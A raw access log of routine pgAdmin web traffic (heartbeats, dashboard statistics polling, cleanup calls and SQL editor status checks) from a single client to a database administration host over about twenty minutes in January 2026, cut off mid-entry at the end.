"https://db.profibot.hu/browser/" +[29/Jan/2026:14:04:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:04:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:05:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:05:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:06:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:06:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:06:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:07:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:07:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:08:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:08:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:09:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:09:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:10:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:10:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:11:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:12:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:12:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:03 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:13:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:13:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:14:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:14:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:14:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:15:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:15:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:16:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:17:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:17:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:18:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:18:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:19:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:19:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:20:52 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:20:52 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:20:52 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:20:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:20 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:21:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:22:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:22:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:23:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:23:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:24:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:24:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:25:55 +0000] - 200 200 - POST https db.profibot.hu 